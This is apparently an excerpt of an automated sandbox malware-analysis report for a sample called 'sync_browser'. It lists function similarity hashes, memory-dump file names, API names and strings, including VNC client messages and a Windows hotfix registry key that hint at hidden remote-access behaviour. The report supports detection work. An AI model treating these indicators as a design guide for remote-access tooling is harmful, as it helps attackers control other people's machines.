                                                                                          • Opcode ID: dbcc6fba753eff514446a0364bbb8b9bc7cf6d08a70ced7c788015d2b9f2cd1e
                                                                                          • Instruction ID: 50681e4c3a985672461700b9a5a0f7de385639564af8b43bfe9b1113224d109c
                                                                                          • Opcode Fuzzy Hash: dbcc6fba753eff514446a0364bbb8b9bc7cf6d08a70ced7c788015d2b9f2cd1e
                                                                                          • Instruction Fuzzy Hash: 01018F33618AC182E7618B28E44036AB7A4E754374F588334F7BA426E8DF7CC498C711
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ClassMessageNamePost
                                                                                          • String ID: WindowsScreenSaverClass
                                                                                          • API String ID: 650004062-352026012
                                                                                          • Opcode ID: ffc7696b1c0006f253adaaa31f662de761ee3bb9df9a87c81459a5f9d86df577
                                                                                          • Instruction ID: b6a6f051688fefe1ad3ce77c82519a7d70ba4fec688fc03dce53aea97b5e14c3
                                                                                          • Opcode Fuzzy Hash: ffc7696b1c0006f253adaaa31f662de761ee3bb9df9a87c81459a5f9d86df577
                                                                                          • Instruction Fuzzy Hash: 90014F32B28A9581F7718B15F8147EAA394FB9CB84F800131EA8C47B98DE3CE159CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessageObjectSendSingleWait
                                                                                          • String ID: vncclient.cpp : client Kill() called
                                                                                          • API String ID: 353115698-1198714380
                                                                                          • Opcode ID: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
                                                                                          • Instruction ID: 19b13025679b1bcdf4804d3d01cd64dbd5feb6e197dfb4e87f086fa842d2b5a3
                                                                                          • Opcode Fuzzy Hash: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
                                                                                          • Instruction Fuzzy Hash: E3017C33A2498181FB58DF65E4453A96365EFA8B64F584331EA398A6D5CF3CD498C380
                                                                                          APIs
                                                                                          Strings
                                                                                          • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009, xrefs: 00007FF67E7C678B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseOpen
                                                                                          • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
                                                                                          • API String ID: 47109696-713323490
                                                                                          • Opcode ID: 2ffe4356ded92a3a12c34227f40b863e036080daa4a6f7c6b14700cb5677b520
                                                                                          • Instruction ID: 4aa71e113a671129f602818cbac69ca74c807e2f11cd39c5b7ed41ef78ca8146
                                                                                          • Opcode Fuzzy Hash: 2ffe4356ded92a3a12c34227f40b863e036080daa4a6f7c6b14700cb5677b520
                                                                                          • Instruction Fuzzy Hash: 1FF06223A2868181EB108B29E44426AA3A8FF75B98F644135EA8D477B4DF6ED099C705
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: getpeernameinet_ntoa
                                                                                          • String ID: <unavailable>
                                                                                          • API String ID: 1982201544-1096956887
                                                                                          • Opcode ID: 5c4993396a7e2dabc89e2e5b10100f8684576445ded950f332601a8c5eebb03d
                                                                                          • Instruction ID: ccc36f88a8ea6130916b21ed3631e94432602dda81c203fb9da77b6bd8bbf77f
                                                                                          • Opcode Fuzzy Hash: 5c4993396a7e2dabc89e2e5b10100f8684576445ded950f332601a8c5eebb03d
                                                                                          • Instruction Fuzzy Hash: 46F01262A2874195EA619B10E891269B364FBA8798F801535F54E47764DF3CE24DCB00
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: free$ErrorFreeHeapLast_errnomalloc
                                                                                          • String ID:
                                                                                          • API String ID: 1225357528-0
                                                                                          • Opcode ID: 565a491ae928519ec85caab6d3bd3699c487abe761962c68358d79beabe01652
                                                                                          • Instruction ID: b57a070f695445a3b4ceb8fd7faa8cf679480580165050da0d574a1bd4b54f99
                                                                                          • Opcode Fuzzy Hash: 565a491ae928519ec85caab6d3bd3699c487abe761962c68358d79beabe01652
                                                                                          • Instruction Fuzzy Hash: A6118E12F3C58242EA44A776B25177E92519F98FC0F485030FE4E8BB8BDE2CD4898704